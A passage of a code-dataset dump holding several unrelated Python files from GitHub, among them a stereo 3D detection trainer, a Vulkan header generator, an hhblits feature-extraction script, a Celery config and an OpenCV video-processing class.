loss = ret_dict.mean()\n loss.backward()\n 
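# gradient clipping stays disabled; uncommenting the next line would cap gradient norms at 10\n            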
#clip_grad_norm_(self.model.parameters(), 10)\n self.optimizer.step()\n\n batch_time.update(time.time() - end)\n end = time.time()\n Bar.suffix = '{phase}: [{0}][{1}/{2}]|Tot: {total:} |ETA: {eta:} '.format(\n self.epoch, batch_idx, num_iters, phase=\"train\",\n total=bar.elapsed_td, eta=bar.eta_td)\n\n for l in avg_loss_stats:\n avg_loss_stats[l].update(\n tb_dict[l], inputs['left_img'].shape[0])\n Bar.suffix = Bar.suffix + '|{} {:.4f} '.format(l, avg_loss_stats[l].avg)\n\n bar.next()\n bar.finish()\n\n def inference(self):\n # torch.set_grad_enabled(False)\n self.model.eval()\n left_results = {}\n right_results = {}\n dataset = self.test_loader.dataset\n\n with torch.no_grad():\n print(len(self.test_loader))\n progress_bar = tqdm.tqdm(total=len(self.test_loader), leave=True, desc='Evaluation Progress')\n for batch_idx, inputs in enumerate(self.test_loader):\n # load evaluation data and move data to GPU.\n for key, val in inputs.items():\n if not isinstance(val, np.ndarray):\n continue\n if key in ['frame_id', 'metadata', 'calib']:\n continue\n # TODO\n if key in ['left_img', 'right_img']:\n inputs[key] = torch.from_numpy(val).float().cuda()\n # inputs[key] = kornia.image_to_tensor(val).float().cuda()\n elif key in ['image_shape']:\n inputs[key] = torch.from_numpy(val).int().cuda()\n else:\n inputs[key] = torch.from_numpy(val).float().cuda()\n\n pred_dicts= self.model(inputs, False)\n\n dets_l, dets_r = self.process_dets2result(pred_dicts, inputs['frame_id'], inputs['bbox_downsample_ratio'])\n left_results.update(dets_l)\n right_results.update(dets_r)\n\n\n progress_bar.update()\n\n progress_bar.close()\n\n self.save_results(left_results, './left_outputs')\n self.save_results(right_results, './right_outputs')\n\n self.logger.info(\"left image eval epoch{}\".format(self.epoch))\n self.test_loader.dataset.eval(results_dir='./left_outputs/data', logger=self.logger, label_flag='left')\n self.logger.info(\"right image eval epoch{}\".format(self.epoch))\n self.test_loader.dataset.eval(results_dir='./right_outputs/data', logger=self.logger, label_flag='right')\n\n def save_results(self, results, output_dir='./outputs'):\n output_dir = os.path.join(output_dir, 'data')\n if os.path.exists(output_dir):\n shutil.rmtree(output_dir,True)\n os.makedirs(output_dir, exist_ok=True)\n\n for img_id in results.keys():\n output_path = os.path.join(output_dir, '{:06d}.txt'.format(img_id))\n\n f = open(output_path, 'w')\n for i in range(len(results[img_id])):\n class_name = self.class_name[int(results[img_id][i][0])]\n f.write('{} 0.0 0'.format(class_name))\n for j in range(1, len(results[img_id][i])):\n f.write(' {:.2f}'.format(results[img_id][i][j]))\n f.write(' 1.50 1.69 4.33 3.45 2.41 36.08 -1.55 2.45') #TODO remove it\n f.write('\\n')\n f.close()\n\n def process_dets2result(self, outputs, frame_id, bbox_downsample_ratio):\n dets_l, dets_r = extract_dets_from_stereo_outputs(outputs=outputs, K=50)\n dets_l = dets_l.detach().cpu().numpy()\n dets_r = dets_r.detach().cpu().numpy()\n # get corresponding calibs & transform tensor to numpy\n calibs = [self.test_loader.dataset.get_calib(index) for index in frame_id]\n #info = {key: val.detach().cpu().numpy() for key, val in info.items()}\n #cls_mean_size = self.test_loader.dataset.cls_mean_size\n dets_l = decode_detections(dets=dets_l,\n frame_id=frame_id,\n bbox_downsample_ratio=bbox_downsample_ratio,\n calibs=calibs,\n threshold=self.cfg.get('threshold', 0.2))\n dets_r = decode_detections(dets=dets_r,\n frame_id=frame_id,\n 
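# bbox_downsample_ratio presumably maps the boxes from feature-map scale back to image scale\n                                   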
bbox_downsample_ratio=bbox_downsample_ratio,\n calibs=calibs,\n threshold=self.cfg.get('threshold', 0.2))\n return dets_l, dets_r\n","repo_name":"czy341181/Stereo3D_codebase","sub_path":"lib/helpers/trainer_helper.py","file_name":"trainer_helper.py","file_ext":"py","file_size_in_byte":10166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"32192371718","text":"\nimport os,re,sys\nfrom generator import *\n\n# CGeneratorOptions - subclass of GeneratorOptions.\n#\n# Adds options used by COutputGenerator objects during C language header\n# generation.\n#\n# Additional members\n# prefixText - list of strings to prefix generated header with\n# (usually a copyright statement + calling convention macros).\n# protectFile - True if multiple inclusion protection should be\n# generated (based on the filename) around the entire header.\n# protectFeature - True if #ifndef..#endif protection should be\n# generated around a feature interface in the header file.\n# genFuncPointers - True if function pointer typedefs should be\n# generated\n# protectProto - If conditional protection should be generated\n# around prototype declarations, set to either '#ifdef'\n# to require opt-in (#ifdef protectProtoStr) or '#ifndef'\n# to require opt-out (#ifndef protectProtoStr). Otherwise\n# set to None.\n# protectProtoStr - #ifdef/#ifndef symbol to use around prototype\n# declarations, if protectProto is set\n# apicall - string to use for the function declaration prefix,\n# such as APICALL on Windows.\n# apientry - string to use for the calling convention macro,\n# in typedefs, such as APIENTRY.\n# apientryp - string to use for the calling convention macro\n# in function pointer typedefs, such as APIENTRYP.\n# indentFuncProto - True if prototype declarations should put each\n# parameter on a separate line\n# indentFuncPointer - True if typedefed function pointers should put each\n# parameter on a separate line\n# alignFuncParam - if nonzero and parameters are being put on a\n# separate line, align parameter names at the specified column\nclass IdGeneratorOptions(GeneratorOptions):\n \"\"\"Represents options during C interface generation for headers\"\"\"\n def __init__(self,\n filename = None,\n directory = '.',\n apiname = None,\n profile = None,\n versions = '.*',\n emitversions = '.*',\n defaultExtensions = None,\n addExtensions = None,\n removeExtensions = None,\n emitExtensions = None,\n sortProcedure = regSortFeatures,\n prefixText = \"\",\n genFuncPointers = True,\n protectFile = True,\n protectFeature = True,\n protectProto = None,\n protectProtoStr = None,\n apicall = '',\n apientry = '',\n apientryp = '',\n indentFuncProto = True,\n indentFuncPointer = False,\n alignFuncParam = 0):\n GeneratorOptions.__init__(self, filename, directory, apiname, profile,\n versions, emitversions, defaultExtensions,\n addExtensions, removeExtensions,\n emitExtensions, sortProcedure)\n self.prefixText = prefixText\n self.genFuncPointers = genFuncPointers\n self.protectFile = protectFile\n self.protectFeature = protectFeature\n self.protectProto = protectProto\n self.protectProtoStr = protectProtoStr\n self.apicall = apicall\n self.apientry = apientry\n self.apientryp = apientryp\n self.indentFuncProto = indentFuncProto\n self.indentFuncPointer = indentFuncPointer\n self.alignFuncParam = alignFuncParam\n\n# COutputGenerator - subclass of OutputGenerator.\n# Generates C-language API interfaces.\n#\n# ---- methods ----\n# COutputGenerator(errFile, warnFile, diagFile) - args 
as for\n#   OutputGenerator. Defines additional internal state.\n# ---- methods overriding base class ----\n# beginFile(genOpts)\n# endFile()\n# beginFeature(interface, emit)\n# endFeature()\n# genType(typeinfo,name)\n# genStruct(typeinfo,name)\n# genGroup(groupinfo,name)\n# genEnum(enuminfo, name)\n# genCmd(cmdinfo)\nclass IdOutputGenerator(OutputGenerator):\n    \"\"\"Generate specified API interfaces in a specific style, such as a C header\"\"\"\n    # This is an ordered list of sections in the header file.\n    TYPE_SECTIONS = ['include', 'define', 'basetype', 'handle', 'enum',\n                     'group', 'bitmask', 'funcpointer', 'struct']\n    ALL_SECTIONS = TYPE_SECTIONS + ['commandPointer', 'command']\n    def __init__(self,\n                 errFile = sys.stderr,\n                 warnFile = sys.stderr,\n                 diagFile = sys.stdout):\n        OutputGenerator.__init__(self, errFile, warnFile, diagFile)\n        # Internal state - accumulators for different inner block text\n        self.sections = dict([(section, []) for section in self.ALL_SECTIONS])\n        self.apicount = 0\n    #\n    def beginFile(self, genOpts):\n        OutputGenerator.beginFile(self, genOpts)\n        # C-specific\n        #\n        # Multiple inclusion protection & C++ wrappers.\n        if (genOpts.protectFile and self.genOpts.filename):\n            headerSym = re.sub('\\.h', '_h',\n                               os.path.basename(self.genOpts.filename)).upper()\n            write('#ifndef', headerSym, file=self.outFile)\n            write('#define', headerSym, file=self.outFile)\n            self.newline()\n        #\n        # User-supplied prefix text, if any (list of strings)\n        if (genOpts.prefixText):\n            for s in genOpts.prefixText:\n                write(s, file=self.outFile)\n        write('enum ApiCallId\\n{', file=self.outFile)\n    def endFile(self):\n        # C-specific\n        # Finish C++ wrapper and multiple inclusion protection\n        self.newline()\n        write('};', file=self.outFile)\n        if (self.genOpts.protectFile and self.genOpts.filename):\n            self.newline()\n            write('#endif', file=self.outFile)\n        # Finish processing in superclass\n        OutputGenerator.endFile(self)\n    def beginFeature(self, interface, emit):\n        # Start processing in superclass\n        OutputGenerator.beginFeature(self, interface, emit)\n        # C-specific\n        # Accumulate includes, defines, types, enums, function pointer typedefs,\n        # end function prototypes separately for this feature. They're only\n        # printed in endFeature().\n        self.sections = dict([(section, []) for section in self.ALL_SECTIONS])\n    def endFeature(self):\n        # C-specific\n        # Actually write the interface to the output file.\n        if (self.emit):\n            if (self.sections['command']):\n                write('\\n'.join(self.sections['command']), end='', file=self.outFile)\n            self.newline()\n        # Finish processing in superclass\n        OutputGenerator.endFeature(self)\n    #\n    # Append a definition to the specified section\n    def appendSection(self, section, text):\n        # self.sections[section].append('SECTION: ' + section + '\\n')\n        self.sections[section].append(text)\n    #\n    # Type generation\n    def genType(self, typeinfo, name, alias):\n        OutputGenerator.genType(self, typeinfo, name, alias)\n    #\n    # Struct (e.g. C \"struct\" type) generation.\n    # This is a special case of the <type> tag where the contents are\n    # interpreted as a set of <member> tags instead of freeform C\n    # C type declarations. The <member> tags are just like <param>\n    # tags - they are a declaration of a struct or union member.\n    # Only simple member declarations are supported (no nested\n    # structs etc.)\n    def genStruct(self, typeinfo, typeName, alias):\n        OutputGenerator.genStruct(self, typeinfo, typeName, alias)\n    #\n    # Group (e.g. 
C \"enum\" type) generation.\n    # These are concatenated together with other types.\n    def genGroup(self, groupinfo, groupName, alias):\n        OutputGenerator.genGroup(self, groupinfo, groupName, alias)\n    # Enumerant generation\n    # <enum> tags may specify their values in several ways, but are usually\n    # just integers.\n    def genEnum(self, enuminfo, name, alias):\n        OutputGenerator.genEnum(self, enuminfo, name, alias)\n    #\n    # Command generation\n    def genCmd(self, cmdinfo, name, alias):\n        OutputGenerator.genCmd(self, cmdinfo, name, alias)\n        tokenname = ' ApiCallId_' + name\n        align = 100 - len(tokenname)\n        self.appendSection('command', '{}{}= 0x1{:03x},'.format(tokenname, (' ' * align), self.apicount))\n        self.apicount += 1\n","repo_name":"Refael10ru/VK_TEST","sub_path":"1.2.148.1/source/gfxreconstruct/framework/generated/idgenerator.py","file_name":"idgenerator.py","file_ext":"py","file_size_in_byte":8437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"35979644172","text":"# -*- coding: Latin-1 -*-\n\n\ndef table(nb, max=10):\n    \"\"\"Function that computes the multiplication tables\n    of nb from 0 up to max\"\"\"\n    i = 0\n    while i <= max:\n        print(nb, \" *\", i, \" = \", nb * i)\n        i += 1\n","repo_name":"smilereptile/python","sub_path":"PycharmProjects/getting_started/packages/fonctions.py","file_name":"fonctions.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"40227982749","text":"import os\r\nimport re\r\nimport numpy as np\r\n\r\ndef read_data_file_trip(filename):\r\n    f = open(filename)\r\n    data = f.readlines()\r\n    f.close()\r\n\r\n    results=[]\r\n    block=len(data)//2\r\n    for index in range(block):\r\n        item1=data[index*2+0].split()\r\n        name =item1[0].strip()\r\n        seq=item1[1].strip()\r\n        item2 = data[index * 2 + 1].split() #label\r\n        item = []\r\n        item.append(name)\r\n        item.append(seq)\r\n        results.append(item)\r\n    return results\r\n\r\ndef extratdataa3m_hmm(file,desta3mfolder,desthmmfolder):\r\n    student_tuples = read_data_file_trip(file)\r\n    acid20 = 'ARNDCQEGHILKMFPSTWYV'\r\n    for name, seq in student_tuples:\r\n        with open(os.path.join(desta3mfolder, 'tmphhm.seq'), 'w') as f:\r\n            f.write('>'+name+'\\n'+seq)\r\n        f.close()\r\n        cmd = 'hhblits -i '\r\n        cmd += os.path.join(desta3mfolder, 'tmphhm.seq')\r\n        cmd+=' -oa3m '\r\n        cmd+= os.path.join(desta3mfolder, name+'.a3m ')\r\n        cmd += ' -ohhm '\r\n        cmd += os.path.join(desthmmfolder, name + '.hhm')\r\n        cmd+=' -n 3 -cpu 30 -d /home/dell/Documents/UniRef30_2022_02_hhsuite/UniRef30_2022_02'\r\n        os.system(cmd)\r\n\r\n\r\nif __name__ == '__main__':\r\n    print('----prepare dataset------')\r\n\r\n    extratdataa3m_hmm('../DataSet/atp-17-for-227.txt',\r\n                      '../DataSet/hhdataseta3m/',\r\n                      '../DataSet/hhdatasethhm/')\r\n\r\n    extratdataa3m_hmm('../DataSet/atp-41-for-388.txt',\r\n                      '../DataSet/hhdataseta3m/',\r\n                      '../DataSet/hhdatasethhm/')\r\n\r\n    extratdataa3m_hmm('../DataSet/atp-227.txt',\r\n                      '../DataSet/hhdataseta3m/',\r\n                      '../DataSet/hhdatasethhm/')\r\n\r\n    extratdataa3m_hmm('../DataSet/atp-388.txt',\r\n                      '../DataSet/hhdataseta3m/',\r\n                      '../DataSet/hhdatasethhm/')\r\n\r\n    extratdataa3m_hmm('../DataSet/atp-549.txt',\r\n                      '../DataSet/hhdataseta3m/',\r\n                      '../DataSet/hhdatasethhm/')\r\n    
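# at this point hhblits has written .a3m/.hhm feature files for all datasets listed above\r\n    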
print('----finish-------')\r\n\r\n","repo_name":"jerry1984Y/ATP-Deep","sub_path":"feature_extract/extract_hhm.py","file_name":"extract_hhm.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"30545803823","text":"import numpy as np\nimport cv2 as cv\nimport matplotlib.pyplot as plt\n\nimg = cv.imread(\"1.jpg\")\n\nrows,cols = img.shape[:2]\nimg1 = np.float32([[50,50],[200,50],[50,200]])\nimg2 = np.float32([[100,100],[200,50],[100,250]])\n\nM = cv.getAffineTransform(img1,img2)\n\nimg3 = cv.warpAffine(img,M,(cols,rows))\nplt.imshow(img3[:,:,::-1])\nplt.show()","repo_name":"123-YUYUYU/opencv","sub_path":"1/9、仿射变换.py","file_name":"9、仿射变换.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"2117918792","text":"from pecan import make_app\nfrom pecan.hooks import PecanHook\n\nfrom urbane.utils import Config\n\nimport traceback\n\n# helpers\ndef setup_app(config):\n\n    # setup defaults\n    if not hasattr(config, 'date_format'):\n        setattr(config, 'date_format', '%Y-%m-%d')\n    if not hasattr(config, 'time_format'):\n        setattr(config, 'time_format', '%H:%M:%S')\n    if not hasattr(config, 'datetime_format'):\n        setattr(config, 'datetime_format', '%s %s' % (config['date_format'], config['time_format']))\n\n    conf = Config()\n    conf.read(config['conf_file'])\n\n    config.update(conf.as_dict())\n\n    app_conf = dict(config.app)\n\n    return make_app(\n        app_conf.pop('root'),\n        logging=getattr(config, 'logging', {}),\n        **app_conf\n    )\n","repo_name":"sreenathmenon/urbane-project-bkps","sub_path":"urbane/urbane/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"24539391586","text":"from typing import Any, Dict, Type, TypeVar\n\nimport attr\n\nT = TypeVar(\"T\", bound=\"EngineConfig\")\n\n\n@attr.s(auto_attribs=True)\nclass EngineConfig:\n    \"\"\"\n    Attributes:\n        name (str):\n        type (str):\n    \"\"\"\n\n    name: str\n    type: str\n\n    def to_dict(self) -> Dict[str, Any]:\n        name = self.name\n        type = self.type\n\n        field_dict: Dict[str, Any] = {}\n        field_dict.update(\n            {\n                \"name\": name,\n                \"type\": type,\n            }\n        )\n\n        return field_dict\n\n    @classmethod\n    def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n        d = src_dict.copy()\n        name = d.pop(\"name\")\n\n        type = d.pop(\"type\")\n\n        engine_config = cls(\n            name=name,\n            type=type,\n        )\n\n        return engine_config\n","repo_name":"kairntech/sherpa-client","sub_path":"sherpa_client/models/engine_config.py","file_name":"engine_config.py","file_ext":"py","file_size_in_byte":817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"38369391813","text":"import parameter\nfrom celery_app.redis_connection import redis_backend\n\n# Configure the broker URI\nbroker_url = \"amqp://{}:{}@{}:5672/{}\".format(\n    parameter.get_env(\"CELERY_BROKER_USER\"),\n    parameter.get_env(\"CELERY_BROKER_PASSWORD\"),\n    parameter.get_env(\"CELERY_BROKER_HOST\"),\n    parameter.get_env(\"CELERY_BROKER_VHOST\"),\n)\n\n# Configure result backend\nresult_backend = \"redis://{}:{}/{}\".format(\n    parameter.get_env(\"REDIS_HOST\"),\n    parameter.get_env(\"REDIS_PORT\"),\n    redis_backend.connection_pool.connection_kwargs.get(\"db\"),\n)\n# result_backend = 'cassandra'\n# cassandra_servers = ['localhost']\n# cassandra_auth_kwargs = {\n# 
'username': parameter.get_env('CASSANDRA_USER'),\n# 'password': parameter.get_env('CASSANDRA_PASS')\n# }\n# cassandra_keyspace = 'celery'\n# cassandra_table = 'tasks'\n# cassandra_read_consistency = 'ONE'\n# cassandra_write_consistency = 'ONE'\n# cassandra_entry_ttl = 86400\n\n# Force celery to just acknowledge the task after it is executed\ntask_acks_late = True\n\naccept_content = [\"json\", \"pickle\"]\n\ntask_serializer = \"pickle\"\n\nresult_serializer = \"pickle\"\n\nworker_prefetch_multiplier = 1\n\nworker_log_format = \"%(asctime)s - %(levelname)s %(processName)s: %(message)s\"\nworker_task_log_format = \"%(asctime)s - %(levelname)s %(processName)s: %(task_name)s[%(task_id)s]: %(message)s\"\n\ntask_send_sent_event = True\n","repo_name":"mfurquimdev/learning_celery","sub_path":"celery_app/celeryconfig.py","file_name":"celeryconfig.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"73248330702","text":"from tree_node import TreeNode\n\n\ndef traverse(root):\n    if not root:\n        return\n\n    print(f\"At node {root}\")\n\n    print(f\"Entering node {root.left} from {root}\")\n    traverse(root.left)\n    print(f\"Leaving node {root.left} from {root}\")\n\n    print(f\"Entering node {root.right} from {root}\")\n    traverse(root.right)\n    print(f\"Leaving node {root.right} from {root}\")\n    return\n\n\nif __name__ == \"__main__\":\n    root = TreeNode(3, TreeNode(9), TreeNode(20, TreeNode(15), TreeNode(7)))\n    traverse(root)\n\n","repo_name":"lexiewangdl/pyalgo","sub_path":"binary_tree/notes.py","file_name":"notes.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"}
{"seq_id":"20184620595","text":"from functools import cached_property\nfrom typing import Dict, Tuple, Union\nfrom collections import deque\nfrom datetime import datetime\nimport itertools\nimport math\nimport time\nimport os\n\nfrom rich import print\nfrom tqdm import tqdm\nimport numpy as np\nimport cv2\n\nfrom src.modules.utils import tuple_handler\nfrom . import Backbone\n\n\nclass Video:\n    def __init__(\n        self,\n        path: str,\n        speed: int = 1,\n        delay: int = 1,\n        subsampling: int = 1,\n        sync: bool = True,\n        resolution: Tuple = None,\n        progress_bar: bool = True,\n        show_fps: Union[Dict, bool] = None,\n        record: Union[Dict, bool] = None,\n    ) -> None:\n        \"\"\"\n        Initializes a Video object.\n\n        Args:\n            path (str): Path of the video to open.\n            speed (int, optional): Playback speed of the video. Defaults to 1.\n            delay (int, optional): Delay between frames in milliseconds. Defaults to 1.\n            subsampling (int, optional): Skip frames during processing. Defaults to 1.\n            sync (bool, optional): Synchronize video playback and frame processing. Defaults to True.\n            resolution (Tuple, optional): Change resolution of the video. Defaults to None.\n            progress_bar (bool, optional): Display progress bar during video playback. Defaults to True.\n            show_fps (Dict or bool, optional): Display video real-time FPS. Defaults to None.\n            record (Dict or bool, optional): Record the video. Defaults to None.\n\n        Raises:\n            FileNotFoundError: If the file is not found.\n        \"\"\"\n        if not os.path.exists(path):\n            raise FileNotFoundError(\n                \"File not found. 
Check again or use an absolute path.\"\n )\n self.path = str(path)\n self.video_capture = cv2.VideoCapture(path)\n self.is_camera = bool(self.total_frame == -1)\n self.__check_speed(speed)\n self.wait = int(delay)\n self.subsampling = max(1, int(subsampling))\n self.sync = bool(sync)\n self.resolution = tuple_handler(resolution, max_dim=2) if resolution else None\n self.__setup_progress_bar(show=progress_bar)\n self.__setup_fps_display(config=show_fps)\n self.__setup_recorder(config=record)\n\n def __check_speed(self, value: Union[int, float]) -> None:\n \"\"\"\n Check and setup speed parameter.\n\n Args:\n value (Union[int, float]): Speed value to check.\n \"\"\"\n if self.is_camera:\n self.speed = 1\n else:\n self.speed = int(max(1, value))\n if isinstance(value, float):\n self.speed_mul = value / self.speed\n\n def __setup_progress_bar(self, show: bool) -> None:\n \"\"\"\n Initializes and sets up a progress bar using tqdm.\n\n Args:\n show (bool): Flag to determine whether to show the progress bar.\n \"\"\"\n self.progress = tqdm(\n disable=not show,\n total=self.total_frame,\n desc=f\" {self.name}\",\n unit=\" frame\",\n smoothing=0.3,\n delay=0.1,\n colour=\"cyan\",\n )\n\n def __setup_fps_display(self, config: Union[Dict, bool]) -> None:\n \"\"\"\n Setup for display video FPS\n\n Args:\n config (Dict or bool): Configuration or `True` for default\n \"\"\"\n if config not in [False, None]:\n self.fps_history = deque(maxlen=config.get(\"smoothness\", 30))\n self.fps_pos = tuple_handler(config.get(\"position\", (20, 40)), max_dim=2)\n\n def __setup_recorder(self, config: Union[Dict, bool]) -> None:\n \"\"\"\n Setup for record the video.\n\n Args:\n config (Dict or bool): A dictionary of configurations. False for disable.\n \"\"\"\n\n # Disable if config is not provided\n if not config:\n return\n\n # Set save folder\n save_folder = os.path.join(\n config[\"path\"],\n datetime.now().strftime(\"%d-%m-%Y\") if self.is_camera else self.stem,\n )\n\n # Create save folder\n if not os.path.exists(save_folder):\n os.makedirs(save_folder, exist_ok=True)\n\n # Config writer\n save_path = os.path.join(save_folder, config[\"name\"] + \".mp4\")\n\n codec = cv2.VideoWriter_fourcc(*\"mp4v\")\n\n fps = float(config[\"fps\"] if config[\"fps\"] else self.fps)\n\n self.recorder_res = (\n tuple_handler(config[\"resolution\"], max_dim=2)\n if config[\"resolution\"]\n else self.size()\n )\n\n # Config writer\n self.recorder = cv2.VideoWriter(\n filename=save_path, fourcc=codec, fps=fps, frameSize=self.recorder_res\n )\n\n # Logging\n print(f\"[INFO] [bold]Save recorded video to:[/] [green]{save_path}[/]\")\n\n def __resync(func):\n \"\"\"Synchronize video speed with fps\"\"\"\n\n # Create wrapper function\n def wrapper(self):\n # Check on first run\n if not hasattr(self, \"start_time\"):\n self.start_time = time.time()\n\n # Run the function\n output = func(self)\n\n # Get delay time\n delay = time.time() - self.start_time\n\n # Check if sync is enable\n if self.sync:\n # Calculate sync value\n sync_time = (\n 1 / self.fps / (self.speed_mul if hasattr(self, \"speed_mul\") else 1)\n )\n # Apply sync if needed\n if delay < sync_time:\n time.sleep(sync_time - delay)\n\n # Display fps if specified\n if hasattr(self, \"fps_history\"):\n self.fps_history.append(math.ceil(1 / (time.time() - self.start_time)))\n self.add_text(\n text=f\"FPS: {math.ceil(np.mean(self.fps_history))}\",\n pos=self.fps_pos,\n thickness=2,\n )\n\n # Setup for new circle\n self.start_time = time.time()\n\n # Return function output\n return 
output\n\n return wrapper\n\n def __iter__(self) -> \"Video\":\n \"\"\"\n Initialize video iteration.\n\n Returns:\n Video: The video object.\n \"\"\"\n\n # Video iteration generate\n def generate():\n for _, frame in iter(self.video_capture.read, (False, None)):\n yield frame\n\n # Generate frame queue\n self.queue = itertools.islice(generate(), 0, None, self.speed)\n\n # Initialize\n self.pause = False\n\n # print(\"[bold]Video progress:[/]\")\n\n return self\n\n @__resync\n def __next__(self) -> Union[cv2.Mat, np.ndarray]:\n \"\"\"\n Get the next frame from the video.\n\n Returns:\n MatLike: The next frame.\n \"\"\"\n\n # Get current frame\n self.current_frame = next(self.queue)\n\n # Change video resolution\n if self.resolution:\n self.current_frame = cv2.resize(self.current_frame, self.resolution)\n\n # Backbone process\n if hasattr(self, \"backbone\"):\n # Check subsampling\n if (self.progress.n % self.subsampling) == 0:\n # Process the current frame\n self.backbone.process(self.current_frame)\n\n # Apply to current frame\n self.current_frame = self.backbone.apply(self.current_frame)\n\n # Recorder the video\n if hasattr(self, \"recorder\"):\n self.recorder.write(\n cv2.resize(self.current_frame, self.recorder_res)\n if self.recorder_res\n else self.current_frame\n )\n\n # Update progress\n self.progress.update(\n max(1, min(self.speed, self.total_frame - self.progress.n))\n )\n\n # Return current frame\n return self.current_frame\n\n def __len__(self) -> int:\n \"\"\"\n Get the total number of frames in the video.\n\n Returns:\n int: Total number of frames.\n \"\"\"\n return int(self.video_capture.get(cv2.CAP_PROP_FRAME_COUNT))\n\n @cached_property\n def name(self) -> str:\n \"\"\"\n Return name of the video\n\n Returns:\n str: name of the video\n \"\"\"\n return self.path.split(\"/\")[-1]\n\n @cached_property\n def stem(self) -> str:\n \"\"\"\n Return name of the video without extension\n\n Returns:\n str: name of the video without extension\n \"\"\"\n return self.name.split(\".\")[0]\n\n @cached_property\n def cap(self) -> cv2.VideoCapture:\n \"\"\"\n Return video capture\n\n Returns:\n VideoCapture\n \"\"\"\n return self.video_capture\n\n @cached_property\n def total_frame(self) -> int:\n \"\"\"\n Return total number of frame\n\n Returns:\n int: total frame\n \"\"\"\n return int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n @cached_property\n def fps(self) -> int:\n \"\"\"\n Return FPS of the video\n\n Returns:\n int: FPS of the video\n \"\"\"\n return int(self.cap.get(cv2.CAP_PROP_FPS))\n\n @cached_property\n def shortcuts(self) -> Dict:\n \"\"\"\n Return shortcut of the video\n\n Returns:\n Dict: Shortcut of the video\n \"\"\"\n return {\n \"quit\": \"q\",\n \"pause\": \"p\",\n \"resume\": \"r\",\n \"detector\": \"1\",\n \"classifier\": \"2\",\n \"heatmap\": \"3\",\n \"track_box\": \"4\",\n }\n\n def setup_backbone(self, config: Dict) -> None:\n \"\"\"\n Initializes and sets up backbone for video process.\n\n Args:\n config (Dict): Configuration for the backbone\n \"\"\"\n self.backbone = Backbone(\n video=self, process_config=config, **config[\"backbone\"]\n )\n\n def custom_shortcut(self, values: Dict):\n \"\"\"\n Updates the existing shortcuts dictionary with the provided new_shortcuts.\n\n Args:\n new_shortcuts (Dict): Dictionary containing shortcut name-key pairs.\n \"\"\"\n self.shortcuts.update(\n {name: key for name, key in values.items() if name in self.shortcuts}\n )\n\n def size(self, reverse: bool = False) -> Tuple[int, int]:\n \"\"\"\n Return video size\n\n Args:\n 
reverse (bool): reverse output. Defaults to (Width, Height)\n\n Returns:\n Tuple: size of the video\n \"\"\"\n w, h = (\n int(self.cap.get(prop))\n for prop in [cv2.CAP_PROP_FRAME_WIDTH, cv2.CAP_PROP_FRAME_HEIGHT]\n )\n return (w, h) if not reverse else (h, w)\n\n def add_box(\n self,\n top_left: Tuple,\n bottom_right: Tuple,\n color: Tuple = (255, 255, 255),\n thickness: int = 1,\n ) -> None:\n \"\"\"\n Add a rectangle to the current frame.\n\n Args:\n top_left (Tuple): Top-left corner coordinates (x, y).\n bottom_right (Tuple): Bottom-right corner coordinates (x, y).\n color (Tuple, optional): Color of the rectangle (B, G, R). Defaults to (255, 255, 255).\n thickness (int, optional): Thickness of the rectangle outline. Defaults to 1.\n\n Returns:\n None\n \"\"\"\n cv2.rectangle(\n img=self.current_frame,\n pt1=tuple_handler(top_left, max_dim=2),\n pt2=tuple_handler(bottom_right, max_dim=2),\n color=tuple_handler(color, max_dim=3),\n thickness=int(thickness),\n )\n\n def add_circle(\n self,\n center: Tuple,\n radius: int,\n color: Tuple = (255, 255, 255),\n thickness: int = 1,\n ) -> None:\n \"\"\"\n Add a circle to the current frame.\n\n Args:\n center (Tuple): Center coordinates (x, y).\n radius (int): Circle radius.\n color (Tuple, optional): Color of the circle (B, G, R). Defaults to (255, 255, 255).\n thickness (int, optional): Thickness of the circle outline. Defaults to 1.\n\n Returns:\n None\n \"\"\"\n cv2.circle(\n img=self.current_frame,\n center=tuple_handler(center, max_dim=2),\n radius=int(radius),\n color=tuple_handler(color, max_dim=3),\n thickness=int(thickness),\n )\n\n def add_point(\n self, center: Tuple, radius: int, color: Tuple = (255, 255, 255)\n ) -> None:\n \"\"\"\n Add a point to the current frame.\n\n Args:\n center (Tuple): Center coordinates (x, y).\n radius (int): Circle radius.\n color (Tuple, optional): Color of the point (B, G, R). Defaults to (255, 255, 255).\n\n Returns:\n None\n \"\"\"\n cv2.circle(\n img=self.current_frame,\n center=tuple_handler(center, max_dim=2),\n radius=int(radius),\n color=tuple_handler(color, max_dim=3),\n thickness=-1,\n )\n\n def add_text(\n self,\n text: str,\n pos: Tuple,\n font_scale: int = 1,\n color: Tuple = (255, 255, 255),\n thickness: int = 1,\n ) -> None:\n \"\"\"\n Add text to the current frame.\n\n Args:\n text (str): Text to add.\n pos (Tuple): Position coordinates (x, y).\n font_scale (int, optional): Font scale for the text. Defaults to 1.\n color (Tuple, optional): Color of the text (B, G, R). Defaults to (255, 255, 255).\n thickness (int, optional): Thickness of the text. Defaults to 1.\n\n Returns:\n None\n \"\"\"\n cv2.putText(\n img=self.current_frame,\n text=str(text),\n org=tuple_handler(pos, max_dim=2),\n fontFace=cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=int(font_scale),\n color=tuple_handler(color, max_dim=3),\n thickness=int(thickness),\n )\n\n def show(self) -> None:\n \"\"\"Show the frame\"\"\"\n if not hasattr(self, \"current_frame\"):\n raise 